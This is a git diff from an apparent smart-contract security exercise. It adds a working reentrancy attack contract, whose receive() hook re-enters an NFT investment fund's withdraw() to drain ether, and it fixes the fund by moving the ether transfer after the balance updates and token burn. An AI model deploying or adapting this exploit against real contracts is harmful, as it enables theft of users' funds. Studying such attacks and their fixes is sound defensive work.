diff --git a/contracts/MallorysMaliciousMisappropriation.sol b/contracts/MallorysMaliciousMisappropriation.sol index 9fddd3f..5f65a07 100644 --- a/contracts/MallorysMaliciousMisappropriation.sol +++ b/contracts/MallorysMaliciousMisappropriation.sol @@ -8,7 +8,37 @@ import { Ownable } from "@openzeppelin/contracts/access/Ownable.sol"; contract MallorysMaliciousMisappropriation is Ownable { NftInvestmentFund public nftInvestmentFund; + error InvestmentFundNotEnded(); + error FailedToSendEther(); + constructor(address payable _nftInvestmentFundAddress) Ownable(msg.sender) { nftInvestmentFund = NftInvestmentFund(_nftInvestmentFundAddress); } + + // Receive is called when the contract receives Ether + // solhint-disable-next-line no-complex-fallback + receive() external payable { + FundToken fundToken = FundToken(nftInvestmentFund.fundToken()); + uint256 withdrawAmount = (nftInvestmentFund.balanceAtEnd() / nftInvestmentFund.fundTokensAtEnd()) * + fundToken.balanceOf(address(this)); + + // The attack + if (address(nftInvestmentFund).balance >= withdrawAmount) { + nftInvestmentFund.withdraw(); + } + } + + function attack() external onlyOwner { + if (!nftInvestmentFund.ended()) revert InvestmentFundNotEnded(); + + FundToken fundToken = FundToken(nftInvestmentFund.fundToken()); + fundToken.approve(address(nftInvestmentFund), fundToken.balanceOf(address(this))); + + nftInvestmentFund.withdraw(); + } + + function withdraw() external onlyOwner { + (bool sent, ) = payable(msg.sender).call{ value: address(this).balance }(""); + if (!sent) revert FailedToSendEther(); + } } diff --git a/contracts/NftInvestmentFund.sol b/contracts/NftInvestmentFund.sol index f7fc628..bfd3b3a 100644 --- a/contracts/NftInvestmentFund.sol +++ b/contracts/NftInvestmentFund.sol @@ -90,13 +90,13 @@ contract NftInvestmentFund is AccessControl, IERC721Receiver { if (balanceAtEnd > 0 && fundTokensAtEnd > 0 && fundToken.balanceOf(msg.sender) > 0) { uint256 withdrawAmount = (balanceAtEnd / fundTokensAtEnd) * fundToken.balanceOf(msg.sender); - (bool sent, ) = payable(msg.sender).call{ value: withdrawAmount }(""); - require(sent, "Failed to send Ether"); - // Their tokens are burnt so that they cannot withdraw twice balanceAtEnd -= withdrawAmount; fundTokensAtEnd -= fundToken.balanceOf(msg.sender); fundToken.burnFrom(msg.sender, fundToken.balanceOf(msg.sender)); + + (bool sent, ) = payable(msg.sender).call{ value: withdrawAmount }(""); + require(sent, "Failed to send Ether"); } }